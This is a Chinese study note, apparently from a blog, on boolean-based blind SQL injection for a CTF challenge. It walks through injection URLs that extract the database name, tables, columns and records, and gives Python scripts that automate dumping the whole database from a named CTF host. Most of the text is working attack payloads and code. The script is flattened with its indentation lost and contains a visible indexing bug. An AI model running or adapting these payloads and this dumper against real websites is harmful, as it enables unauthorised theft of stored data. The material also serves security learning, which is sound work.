基于布尔的盲注学习笔记
来源:互联网 发布:unity3d streamreader 编辑:程序博客网 时间:2024/05/17 05:01
exp利用到的ctf题:简单的sql注入之3
步骤:
首先测试是否为布尔盲注:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
若为布尔盲注,则按照以下步骤进行:
一、得到数据库的长度
http://localhost/index.php?id=2' andlength(database())>1%23
二、获取数据库名称
姿势:http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
python脚本自动获取:
import requestsdef getDBName(DBName_len): DBName = "" success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2" success_response_len = len(requests.get(success_url).text) url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' print("Start to retrieve database name...") print("Success_response_len is: ", success_response_len) for i in range( 1, DBName_len + 1): print("Number of letter: " , i) tempDBName = DBName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: DBName += char print("DBName is: " + DBName + "...") break if tempDBName == DBName: print("Letters too little! Program ended." ) exit() print("Retrieve completed! DBName is: " + DBName) getDBName(5)
三、获取表长度
姿势:http://localhost/index.php?id=2' and(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
四、获取表名
和第二步获得数据库名差不多,姿势稍微变了一下:
http://localhost/index.php?id=2' andascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)), {0}, 1)={1}%23
五、获取字段的个数和长度
姿势:http://localhost/index.php?id=2' and (select length(column_name) from information_schema.columns where table_name =0x666C6167 limit 0,1)>0%23
其中limit 0,1表示第一列,limit 1,1为第二列,依次类推。
六、获取字段名称
姿势:http://localhost/index.php?id=2' and ascii(substr((select column_name from information_schema.columns where table_name =0x666C6167 limit 0,1), {0}, 1))={1}%23
七、脱裤
1.首先判断有该表有多少条记录:
http://localhost/index.php?id=2' and (select count(*) from flag)>0%23
2.然后获取当前记录的长度:
http://localhost/index.php?id=2' and (select length(flag) from flag limit 0,1)>0%23
3.获取当前记录的值:
http://localhost/index.php?id=2' and ascii(substr((select flag from flag limit 0,1), {0}, 1))={1}%23
自己写的脚本:
import requestsimport binasciiMAX_DBName_len = 100MAX_TableName_len = 100MAX_ColumnName_len = 100MAX_Data_len = 100MAX_Table_Num = 100MAX_Column_Num = 100MAX_Data_Num = 100success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"success_response_len = len(requests.get(success_url).text)chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'def get_DBName_len(): print("Start to get DBName_len...") DBName_len = 0 url_template = success_url + "' and (length(database()))>{0}%23" for i in range(0, MAX_DBName_len): url = url_template.format(i) response = requests.get(url) if len(response.text) != success_response_len: DBName_len = i; print("DBName_len is: ", DBName_len) break; if DBName_len == 0: if i == MAX_DBName_len - 1: print("DBName_len > MAX_DBName_len!") print("Cannot get DB_len. Program ended.") exit() return DBName_lendef get_DBName(DBName_len): print("Start to retrieve database name...") DBName = "" url_template = success_url + "' and ascii(substr(database(),{0},1))={1}%23" for i in range(1, DBName_len + 1): print("Number of letter: ", i) tempDBName = DBName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: DBName += char print("DBName is: " + DBName + "...") break if tempDBName == DBName: print("Letters too little! Program ended.") exit() print("Retrieve completed! DBName is: " + DBName) return DBNamedef get_TableName_len(Table_num): print("Start to get TableName_len...") TableName_len = 0 url_template = success_url + "' and (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)>{1}%23" for i in range(0, MAX_TableName_len): url = url_template.format(Table_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: TableName_len = i# print("TabelName_len is: ", TableName_len) break if TableName_len == 0: if i == MAX_TableName_len - 1: print("TableName_len > MAX_TableName_len!")# print("Cannot get TableName_len. Program ended.") return TableName_lendef get_TableName(Table_num, TableName_len): print("Start to get TableName...") TableName = "" url_template = success_url + "' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}%23" for i in range(1, TableName_len + 1): print("Number of letter: ", i) tempTableName = TableName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(Table_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: TableName += char print("TableName is: " + TableName + "...") break if tempTableName == TableName: print("Letters too little! Program ended.") exit() print("Retrieve completed! TableName is: " + TableName) return TableNamedef choose_Table(): Tables = [] for Table_num in range(1, MAX_Table_Num): TableName_len = get_TableName_len(Table_num) if TableName_len == 0: break TableName = get_TableName(Table_num, TableName_len) Tables.append(TableName) for i in range(len(Tables)): print(i, ": " + Tables[i - 1]) value = input('Please input number to choose which table you want to dump:') Table_num_chosen = int(value) print("You have chose table: " + Tables[Table_num_chosen - 1]) return Tables[Table_num_chosen - 1]def get_ColumnName_len(Column_num, TableName): print("Start to get ColumnName_len...") ColumnName_len = 0 url_template = success_url + "' and (select length(column_name) from information_schema.columns where table_name = {0} limit {1},1)>{2}%23" for i in range(0, MAX_ColumnName_len): url = url_template.format(str2hex(TableName), Column_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: ColumnName_len = i print("ColumnName_len is: ", ColumnName_len) break if ColumnName_len == 0: if i == MAX_ColumnName_len - 1: print("ColumnName_len > MAXName_Column_len!") return ColumnName_lendef get_ColumnName(Column_num, ColumnName_len, TableName): print("Start to get ColumnName...") ColumnName = "" url_template = success_url + "' and ascii(substr((select column_name from information_schema.columns where table_name = {0} limit {1},1),{2},1))={3}%23" for i in range(1, ColumnName_len + 1): print("Number of letter: ", i) tempColumnName = ColumnName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(str2hex(TableName), Column_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: ColumnName += char print("ColumnName is: " + ColumnName + "...") break if tempColumnName == ColumnName: print("Letters too little! Program ended.") exit() print("Retrieve completed! ColumnName is: " + ColumnName) return ColumnNamedef get_Columns(TableName): Columns = [] for Column_num in range(1, MAX_Column_Num): ColumnName_len = get_ColumnName_len(Column_num, TableName) if ColumnName_len == 0: break ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName) Columns.append(ColumnName) for i in range(len(Columns)): print(i, ": " + Columns[i - 1]) return Columnsdef get_Data_len(TableName, ColumnName, Data_num): print("Start to get Data_len...") Data_len = 0 url_template = success_url + "' and (select length({0}) from {1} limit {2},1)>{3}%23" for i in range(0, MAX_Data_len): url = url_template.format(ColumnName, TableName, Data_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: Data_len = i print("Data_len is: ", Data_len) break if Data_len == 0: if i == MAX_Data_len - 1: print("Data_len > MAX_Data_len!") return Data_lendef get_Data(TableName, ColumnName, Data_num, Data_len): print("Start to get Data...") Data = "" url_template = success_url + "' and ascii(substr((select {0} from {1} limit {2},1),{3},1))={4}%23" for i in range(1, Data_len + 1): print("Number of letter: ", i) tempData = Data for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(ColumnName, TableName, Data_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: Data += char print("Data is: " + Data + "...") break if tempData == Data: print("Letters too little! Program ended.") exit() print("Retrieve completed! Data is: " + Data) return Datadef get_Data_num(TableName): print("Start to get Data_num...") Data_num = 0 url_template = success_url + "' and (select count(*) from {0})>{1}%23" for i in range(0, MAX_Data_Num): url = url_template.format(TableName, i) response = requests.get(url) if len(response.text) != success_response_len: Data_num = i print("Data_num is: ", Data_num) break if Data_num == 0: if i == MAX_Data_Num - 1: print("Data_num > MAX_Data_Num!") print("Cannot get Data_len.") return Data_numdef str2hex(str): result = "0x" str_byte = str.encode() result = result + binascii.b2a_hex(str_byte).decode() return resultDBName_len = get_DBName_len()DBName = get_DBName(DBName_len)TableName = choose_Table()Columns = get_Columns(TableName)Data_num = get_Data_num(TableName)Datas = []for i in range(len(Columns)): ColumnName = Columns[i] for j in range(Data_num): Data_len = get_Data_len(TableName, ColumnName, Data_num) Data = get_Data(TableName, ColumnName, Data_num, Data_len) Datas[j] += "\t" + Dataprint("***************************")print("Database: " + DBName + "Table: " + TableName)print("***************************")print("\t")for i in range(len(Columns)): print(Columns[i], end="\t")for i in range(Data_num): print(Datas[i])print("Program successfully ended!")print("***************************")# #the first table# Table_num = 1# TableName_len = get_TableName_len(Table_num)# TableName = get_TableName(Table_num, TableName_len)## #the first column# Column_num = 1# ColumnName_len = get_ColumnName_len(Column_num, TableName)# ColumnName = get_ColumnName(Column_num, ColumnName_len)# # #the first record# Data_num = 1# Data_len = get_Data_len(TableName, ColumnName, Data_num)# Data = get_Data(TableName, ColumnName, Data_num, Data_len)## print("***************************")# print("Database: " + DBName)# print("Table: " + TableName)# print("Column: " + ColumnName)# print("Data: " + Data)# print("Program successfully ended!")# print("***************************")
0 0
- 基于布尔的盲注学习笔记
- sql注入基于布尔/时间的盲注详解
- 基于csg的布尔运算
- 慕课网学习笔记之python的布尔运算
- numpy学习笔记-用于布尔型数组的方法
- 浅谈盲注中的基于时间型和布尔型的注入方法
- C#.NET学习笔记7--11---算术运算符,变量赋值,变量的交换,布尔表达式1,布尔表达式2
- 基于布尔注入的Python代码
- 搜索引擎:第一章布尔查询学习笔记
- 【js学习笔记-017】-- 布尔值
- Objective-C学习笔记-之布尔类型
- Python学习笔记二:布尔表达式
- 《计算机系统要素》学习笔记:第一章布尔逻辑
- 学习笔记:信息检索(1) 布尔检索
- 学习Objective-C的布尔类型
- 基于栈数据结构的算法(poj-布尔表达式)
- 信息检索导论:第一章 布尔检索 学习笔记
- 信息检索导论学习笔记(一) 布尔检索
- 数据库-锁定
- Zxing界面优化(竖屏、拉伸处理、扫描框大小和扫描线移动)
- Java SAX解析XML
- STC15系列单片机头文件STC15.H在哪?
- allegro 元件编号更新
- 基于布尔的盲注学习笔记
- C# Socket简单例子(服务器与客户端通信)
- mybatis使用逆向工程(xml)生成实体
- 微信小程序集成Redux
- C# winform 安装程序打包(自定义操作)
- CVPR 2014 ObjectnessBING 原文翻译
- 最新uboot的Kbuild系统 2 make rpi_defconfig
- js 时间差(过去了多少时间、还剩多少时间)
- Spring IOC原理之Java反射机制